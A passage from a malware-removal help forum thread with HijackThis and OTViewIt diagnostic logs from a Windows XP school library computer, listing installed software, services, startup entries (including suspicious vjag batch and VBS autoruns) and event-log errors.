[2005/08/10 16:58:18 | 00,491,520 | ---- | M] () -- C:\WINDOWS\system32\DKabcoms.exe:*:Enabled:Dell Enhanced TCP/IP

========== (O10) Winsock2 Catalogs ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\]
NameSpace_Catalog5\Catalog_Entries\000000000004 [mdnsNSP] -- C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)

========== (O18) Protocol Handlers ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
ipp: [HKLM - No CLSID value]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\] - Protocol Handlers
[2007/08/28 23:55:14 | 01,014,128 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL ipp\0x00000001:{E1D2BF42-A96B-11d1-9C6B-0000F875AC61} (HKLM) [HKLM - MSDAMON.BINDER]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
msdaipp: [HKLM - No CLSID value]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\] - Protocol Handlers
[2007/08/28 23:55:14 | 01,014,128 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL msdaipp\0x00000001:{E1D2BF42-A96B-11d1-9C6B-0000F875AC61} (HKLM) [HKLM - MSDAMON.BINDER]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\] - Protocol Handlers
[2007/08/28 23:55:14 | 01,014,128 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL msdaipp\oledb:{E1D2BF40-A96B-11d1-9C6B-0000F875AC61} (HKLM) [HKLM - MSDAIPP.BINDER]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
[2006/10/26 13:45:02 | 00,873,216 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Help\hxds.dll (ms-help:{314111c7-a502-11d2-bbca-00c04f8ec294} (HKLM) [HxProtocol Class])

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
[2007/05/10 13:45:34 | 08,069,464 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Web Components\11\OWC11.DLL (mso-offdap11:{32505114-5902-49B2-880A-1F7738E5A384} (HKLM) [Data Page Plugable Protocal mso-offdap11 Handler])

========== (O18) Protocol Filters ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\] - Protocol Filters
[2006/10/26 21:41:48 | 00,044,344 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OFFICE12\MSOXMLMF.DLL text/xml:{807563E5-5146-11D5-A672-00B0D022E945} (HKLM) [Microsoft Office InfoPath XML Mime Filter]

========== HKEY_LOCAL_MACHINE Uninstall List ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{02DFF6B1-1654-411C-8D7B-FD6052EF016F}"=Apple Software Update
"{034759DA-E21A-4795-BFB3-C66D17FAD183}"=Sophos Anti-Virus
"{08786A53-D98F-484A-867C-3302BC5AE30D}"=Digital Blue QX5 Microscope
"{08CA9554-B5FE-4313-938F-D4A417B81175}"=QuickTime
"{15C418EB-7675-42be-B2B3-281952DA014D}"=Sophos AutoUpdate
"{2348B97D-C991-438F-BC44-294C931E7B8B}"=SMART Essentials for Educators
"{26A24AE4-039D-4CA4-87B4-2F83216011FF}"=Java™ 6 Update 13
"{281ECE39-F043-492B-8337-F2E546B5604A}"=PowerDVD
"{2AFFFDD7-ED85-4A90-8C52-5DA9EBDC9B8F}"=Microsoft SQL Server 2005 Express Edition (MSSMLBIZ)
"{2BA00471-0328-3743-93BD-FA813353A783}"=Microsoft .NET Framework 3.0 Service Pack 1
"{30465B6C-B53F-49A1-9EBA-A3F187AD502E}"=Sonic Update Manager
"{3248F0A8-6813-11D6-A77B-00B0D0160050}"=Java™ 6 Update 5
"{34C7E079-2B62-478F-88B2-E3EDACDE5078}"=AVerVision Software
"{350C97B0-3D7C-4EE8-BAA9-00BCB3D54227}"=WebFldrs XP
"{353D20CC-719B-4A60-AD33-D03F88C10330}"=Microsoft Office Accounting PayPal Addin
"{44734179-8A79-4DEE-BB08-73037F065543}"=Apple Mobile Device Support
"{46486451-E60F-42C3-92D7-796D8594688A}"=SMART Board Software
"{46614A49-222A-48EF-87A9-BFD603E608E1}"=Microsoft Office Accounting Fixed Asset Manager
"{47BF1BD6-DCAC-468F-A0AD-E5DECC2211C3}"=Bonjour
"{50120000-1105-0000-0000-0000000FF1CE}"=Microsoft Office 2007 Primary Interop Assemblies
"{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}"=Microsoft SQL Server Setup Support Files (English)
"{56B4002F-671C-49F4-984C-C760FE3806B5}"=Microsoft SQL Server VSS Writer
"{585776BC-4BD6-4BD2-A19A-1D6CB44A403B}"=iTunes
"{5EE30018-CB99-464D-903D-F794592F503B}"=Lightspeed Systems User Agent v2.00.00
"{5FA793A6-0071-42C1-9355-8F69A428C44F}"=Microsoft Office Accounting ADP Payroll Addin
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}"=Microsoft Silverlight
"{8A708DD8-A5E6-11D4-A706-000629E95E20}"=Intel® Graphics Media Accelerator Driver
"{8C711818-076E-475C-B95B-DF11CD9D8DBE}"=Microsoft Office Accounting Equifax Addin
"{90120000-0010-0409-0000-0000000FF1CE}"=Microsoft Software Update for Web Folders (English) 12
"{90120000-0015-0409-0000-0000000FF1CE}"=Microsoft Office Access MUI (English) 2007
"{90120000-0015-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0016-0409-0000-0000000FF1CE}"=Microsoft Office Excel MUI (English) 2007
"{90120000-0016-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0018-0409-0000-0000000FF1CE}"=Microsoft Office PowerPoint MUI (English) 2007
"{90120000-0018-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0019-0409-0000-0000000FF1CE}"=Microsoft Office Publisher MUI (English) 2007
"{90120000-0019-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001A-0409-0000-0000000FF1CE}"=Microsoft Office Outlook MUI (English) 2007
"{90120000-001A-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001B-0409-0000-0000000FF1CE}"=Microsoft Office Word MUI (English) 2007
"{90120000-001B-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001F-0409-0000-0000000FF1CE}"=Microsoft Office Proof (English) 2007
"{90120000-001F-0409-0000-0000000FF1CE}_PROHYBRIDR_{3EC77D26-799B-4CD8-914F-C1565E796173}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001F-040C-0000-0000000FF1CE}"=Microsoft Office Proof (French) 2007
"{90120000-001F-040C-0000-0000000FF1CE}_PROHYBRIDR_{430971B1-C31E-45DA-81E0-72C095BAB72C}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001F-0C0A-0000-0000000FF1CE}"=Microsoft Office Proof (Spanish) 2007
"{90120000-001F-0C0A-0000-0000000FF1CE}_PROHYBRIDR_{F7A31780-33C4-4E39-951A-5EC9B91D7BF1}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-002C-0409-0000-0000000FF1CE}"=Microsoft Office Proofing (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}"=Microsoft Office Shared MUI (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}_PROHYBRIDR_{FAD8A83E-9BAC-4179-9268-A35948034D85}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0115-0409-0000-0000000FF1CE}"=Microsoft Office Shared Setup Metadata MUI (English) 2007
"{90120000-0115-0409-0000-0000000FF1CE}_PROHYBRIDR_{FAD8A83E-9BAC-4179-9268-A35948034D85}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0117-0409-0000-0000000FF1CE}"=Microsoft Office Access Setup Metadata MUI (English) 2007
"{90120000-0117-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90A40409-6000-11D3-8CFE-0150048383C9}"=Microsoft Office 2003 Web Components
"{91120000-0031-0000-0000-0000000FF1CE}"=Microsoft Office Professional Hybrid 2007
"{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{BEE75E01-DD3F-4D5F-B96C-609E6538D419}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{A06275F4-324B-4E85-95E6-87B2CD729401}"=Windows Defender
"{A939D341-5A04-4E0A-BB55-3E65B386432D}"=Microsoft Office Small Business Connectivity Components
"{AC76BA86-7AD7-1033-7B44-A81200000003}"=Adobe Reader 8.1.2
"{B0717D5A-1976-482B-9ADF-F19631A541A4}"=Microsoft Office Accounting 2007
"{B32C4059-6E7A-41EF-AD20-56DF1872B923}"=Business Contact Manager for Outlook 2007 SP1
"{B4092C6D-E886-4CB2-BA68-FE5A88D31DE6}_is1"=Spybot - Search & Destroy
"{B508B3F1-A24A-32C0-B310-85786919EF28}"=Microsoft .NET Framework 2.0 Service Pack 1
"{B7F54262-AB66-44B3-88BF-9FC69941B643}"=Broadcom Gigabit Integrated Controller
"{BAF78226-3200-4DB4-BE33-4D922A799840}"=Windows Presentation Foundation
"{BD68F46D-8A82-4664-8E68-F87C55BDEFD4}"=Microsoft SQL Server Native Client
"{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}"=Microsoft .NET Framework 1.1
"{F0A37341-D692-11D4-A984-009027EC0A9C}"=SoundMAX
"{FCD9CD52-7222-4672-94A0-A722BA702FD0}"=Dell Resource CD
"{FF11005D-CBC8-45D5-A288-25C7BB304121}"=Sophos Remote Management System
"{FF9278B4-1A52-4E18-A668-E9F2219F5798}"=Classroom Performance System
"9C7E96126D886BC04FAA6ABAD9312271DB76E1F1"=Windows Driver Package - Digital Blue (marsqx5) Image (04/04/2007 1.0.0.0)
"Adobe Flash Player ActiveX"=Adobe Flash Player ActiveX
"Adobe Shockwave Player"=Adobe Shockwave Player 11
"Ask Toolbar_is1"=Ask Toolbar
"Business Contact Manager"=Business Contact Manager for Outlook 2007 SP1
"Dell_HostCD"=Dell Software Uninstall
"ePatLauncher"=ePatLauncher
"IDNMitigationAPIs"=Microsoft Internationalized Domain Names Mitigation APIs
"InstallShield_{34C7E079-2B62-478F-88B2-E3EDACDE5078}"=AVerVision Software
"Lotus Notes"=Lotus Notes
"Microsoft .NET Framework 1.1 (1033)"=Microsoft .NET Framework 1.1
"Microsoft Office Accounting 2007"=Microsoft Office Accounting 2007
"Microsoft SQL Server 2005"=Microsoft SQL Server 2005
"MSCompPackV1"=Microsoft Compression Client Pack 1.0 for Windows XP
"NLSDownlevelMapping"=Microsoft National Language Support Downlevel APIs
"PROHYBRIDR"=2007 Microsoft Office system
"TestNav"=TestNav
"WIC"=Windows Imaging Component
"Windows Media Format Runtime"=Windows Media Format 11 runtime
"Windows Media Player"=Windows Media Player 11
"Windows XP Service Pack"=Windows XP Service Pack 3
"WMFDist11"=Windows Media Format 11 runtime
"wmp11"=Windows Media Player 11
"Wudf01000"=Microsoft User-Mode Driver Framework Feature Pack 1.0
"XpsEPSC"=XML Paper Specification Shared Components Pack 1.0

========== Last 10 Event Log Errors ==========

[ Application Events ]
Error - 3/30/2009 5:00:43 PM | Computer Name = 103_LIB_S3 | Source = MPSampleSubmission | ID = 5000
Description = EventType mptelemetry, P1 80072efd, P2 endsearch, P3 search, P4 1.1.1593.0,
P5 mpsigdwn.dll, P6 1.1.1593.0, P7 windows defender, P8 NIL, P9 NIL, P10 NIL.

Error - 3/31/2009 1:00:18 PM | Computer Name = 103_LIB_S3 | Source = MPSampleSubmission | ID = 5000
Description = EventType mptelemetry, P1 80072efd, P2 endsearch, P3 search, P4 1.1.1593.0,
P5 mpsigdwn.dll, P6 1.1.1593.0, P7 windows defender, P8 NIL, P9 NIL, P10 NIL.

[ System Events ]
Error - 1/10/2009 1:52:06 PM | Computer Name = 103_LIB_S3 | Source = Kerberos | ID = 7
Description = The kerberos subsystem encountered a PAC verification failure. This
indicates that the PAC from the client 103_LIB_S3$ in realm VVIEW.EDU had a PAC
which failed to verify or was modified. Contact your system administrator.

Error - 1/10/2009 3:25:08 PM | Computer Name = 103_LIB_S3 | Source = Kerberos | ID = 7
Description = The kerberos subsystem encountered a PAC verification failure. This
indicates that the PAC from the client 103_LIB_S3$ in realm VVIEW.EDU had a PAC
which failed to verify or was modified. Contact your system administrator.

Error - 1/18/2009 5:03:41 PM | Computer Name = 103_LIB_S3 | Source = Kerberos | ID = 7
Description = The kerberos subsystem encountered a PAC verification failure. This
indicates that the PAC from the client 103_LIB_S3$ in realm VVIEW.EDU had a PAC
which failed to verify or was modified. Contact your system administrator.

Error - 1/21/2009 6:16:21 PM | Computer Name = 103_LIB_S3 | Source = Kerberos | ID = 7
Description = The kerberos subsystem encountered a PAC verification failure. This
indicates that the PAC from the client 103_LIB_S3$ in realm VVIEW.EDU had a PAC
which failed to verify or was modified. Contact your system administrator.

Error - 1/21/2009 7:17:08 PM | Computer Name = 103_LIB_S3 | Source = MRxSmb | ID = 8003
Description = The master browser has received a server announcement from the computer
103_COUNSELOR that believes that it is the master browser for the domain on transport
NetBT_Tcpip_{346168FD-2809-. The master browser is stopping or an election is being
forced.

Error - 1/23/2009 3:20:09 PM | Computer Name = 103_LIB_S3 | Source = Kerberos | ID = 7
Description = The kerberos subsystem encountered a PAC verification failure. This
indicates that the PAC from the client 103_LIB_S3$ in realm VVIEW.EDU had a PAC
which failed to verify or was modified. Contact your system administrator.

Error - 2/2/2009 9:43:29 AM | Computer Name = 103_LIB_S3 | Source = Windows Update Agent | ID = 16
Description = Unable to Connect: Windows is unable to connect to the automatic updates
service and therefore cannot download and install updates according to the set
schedule. Windows will continue to try to establish a connection.

Error - 2/4/2009 9:43:30 AM | Computer Name = 103_LIB_S3 | Source = Windows Update Agent | ID = 16
Description = Unable to Connect: Windows is unable to connect to the automatic updates
service and therefore cannot download and install updates according to the set
schedule. Windows will continue to try to establish a connection.

Error - 3/20/2009 9:55:57 AM | Computer Name = 103_LIB_S3 | Source = SAVOnAccessFilter | ID = 3997759
Description = Failed to obtain volume information from mount manager.

Error - 3/31/2009 5:16:46 PM | Computer Name = 103_LIB_S3 | Source = Dhcp | ID = 1002
Description = The IP address lease 10.138.25.172 for the Network Card with network
address 00137217D6AA has been denied by the DHCP server 10.138.8.6 (The DHCP Server
sent a DHCPNACK message).


< End of report >


Hijackthis
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 2:59:42 PM, on 4/2/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16791)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe
C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe
C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe
C:\Program Files\Sophos\AutoUpdate\ALsvc.exe
C:\Program Files\Sophos\Remote Management System\RouterNT.exe
c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
C:\Program Files\Lightspeed Systems\User Agent\UAService.exe
C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Analog Devices\Core\smax4pnp.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe
C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
C:\WINDOWS\System32\WScript.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\Sophos\AutoUpdate\ALMon.exe
C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe
C:\Program Files\SMART Technologies Inc\SMART Board Software\Aware.exe
C:\Program Files\SMART Technologies Inc\SMART Board Software\Marker.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\System32\cmd.exe
C:\WINDOWS\system32\xcopy.exe
C:\HiJackThis.exe.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.vview.net
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://go.microsoft.com/fwlink/?LinkId=74005
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: AskBar BHO - {201f27d4-3704-41d6-89c1-aa35e39143ed} - C:\Program Files\AskBarDis\bar\bin\askBar.dll
O2 - BHO: Sophos Web Content Scanner - {39EA7695-B3F2-4C44-A4BC-297ADA8FD235} - C:\Program Files\Sophos\Sophos Anti-Virus\SophosBHO.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: SMART Notebook Download Plugin - {67BCF957-85FC-4036-8DC4-D4D80E00A77B} - C:\Program Files\SMART Technologies Inc\Notebook Software\NotebookPlugin.dll
O2 - BHO: Java™ Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: Ask Toolbar - {3041d03e-fd4b-44e0-b742-2d9b88305f98} - C:\Program Files\AskBarDis\bar\bin\askBar.dll
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\Core\smax4pnp.exe
O4 - HKLM\..\Run: [igfxtray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [igfxhkcmd] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [igfxpers] C:\WINDOWS\system32\igfxpers.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Windows Defender] "C:\Program Files\Windows Defender\MSASCui.exe" -hide
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [ISUSPM Startup] C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
O4 - HKLM\..\Run: [ISUSScheduler] "C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe" -start
O4 - HKLM\..\Run: [PDVDDXSrv] "C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe"
O4 - HKLM\..\Run: [vjag] C:\WINDOWS\system32\auto\vjag3.bat
O4 - HKLM\..\Run: [vjag2] C:\WINDOWS\system32\auto\vjag.vbs
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKUS\S-1-5-21-3925025582-4110435278-4136060888-1115\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe (User 'tme')
O4 - HKUS\S-1-5-18\..\Run: [DWQueuedReporting] "C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\RunOnce: [RunNarrator] Narrator.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [DWQueuedReporting] "C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [RunNarrator] Narrator.exe (User 'Default user')
O4 - Global Startup: AutoUpdate Monitor.lnk = C:\Program Files\Sophos\AutoUpdate\ALMon.exe
O4 - Global Startup: SMART Board Tools.lnk = C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search && Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/windowsupd...b?1207692023140
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = vview.edu
O17 - HKLM\Software\..\Telephony: DomainName = vview.edu
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = vview.edu
O20 - AppInit_DLLs: C:\PROGRA~1\Sophos\SOPHOS~1\SOPHOS~1.DLL
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: dkab_device - Unknown owner - C:\WINDOWS\system32\DKabcoms.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: Sophos Anti-Virus status reporter (SAVAdminService) - Sophos Plc - C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe
O23 - Service: Sophos Anti-Virus (SAVService) - Sophos Plc - C:\Program Files\Sophos\Sophos Anti-Virus\SavService.exe
O23 - Service: SMART Board Service - SMART Technologies Inc. - C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe
O23 - Service: SMART Web Server - Unknown owner - C:\Program Files\SMART Technologies Inc\SMART Board Software\WebServer.exe
O23 - Service: Sophos Agent - Sophos Plc - C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe
O23 - Service: Sophos AutoUpdate Service - Sophos Plc - C:\Program Files\Sophos\AutoUpdate\ALsvc.exe
O23 - Service: Sophos Device Control Service - Sophos Plc - C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe
O23 - Service: Sophos Message Router - Sophos Plc - C:\Program Files\Sophos\Remote Management System\RouterNT.exe
O23 - Service: User Agent Service (UAService) - Lightspeed Systems - C:\Program Files\Lightspeed Systems\User Agent\UAService.exe

--
End of file - 9210 bytes

#9 nightjar59

Posted 02 April 2009 - 03:11 PM

Here we go again with hidden folders......

OTViewIT
OTViewIt logfile created on: 4/2/2009 3:05:50 PM - Run 2
OTViewIt by OldTimer - Version 1.0.21.0 Folder = C:\Documents and Settings\administrator.VVIEW\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 7.0.5730.13)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

1.99 Gb Total Physical Memory | 1.43 Gb Available Physical Memory | 71.78% Memory free
3.84 Gb Paging File | 3.37 Gb Available in Paging File | 87.82% Paging File free
Paging file location(s): C:\pagefile.sys 2046 4092;

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 74.50 Gb Total Space | 61.36 Gb Free Space | 82.36% Space Free | Partition Type: NTFS
Drive D: | 64.77 Mb Total Space | 0.00 Mb Free Space | 0.00% Space Free | Partition Type: CDFS
E: Drive not present or media not loaded
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
I: Drive not present or media not loaded

Computer Name: 103_LIB_S3
Current User Name: Administrator
Logged in as Administrator.

Current Boot Mode: Normal
Scan Mode: All users
Whitelist: On
File Age = 60 Days

========== Processes ==========

[2006/11/03 19:19:58 | 00,013,592 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MsMpEng.exe
[2008/09/24 15:52:08 | 00,098,304 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SavService.exe
[2008/02/18 11:16:30 | 00,110,592 | ---- | M] (Apple, Inc.) -- C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
[2008/01/11 17:50:16 | 00,030,312 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
[2007/07/24 15:17:08 | 00,229,376 | ---- | M] (Apple Inc.) -- C:\Program Files\Bonjour\mDNSResponder.exe
[2009/03/09 05:19:15 | 00,152,984 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\jqs.exe
[2003/06/19 23:25:00 | 00,322,120 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
[2008/10/27 09:14:03 | 00,069,632 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe
[2007/11/02 05:48:32 | 01,283,336 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe
[2009/04/02 05:00:20 | 00,266,240 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe
[2009/01/28 07:24:29 | 00,172,032 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\AutoUpdate\ALsvc.exe
[2009/04/02 05:00:16 | 00,794,624 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\RouterNT.exe
[2008/11/24 22:31:08 | 00,239,968 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
[2008/11/24 22:31:12 | 00,087,904 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
[2008/08/07 14:48:30 | 00,192,512 | ---- | M] (Lightspeed Systems) -- C:\Program Files\Lightspeed Systems\User Agent\UAService.exe
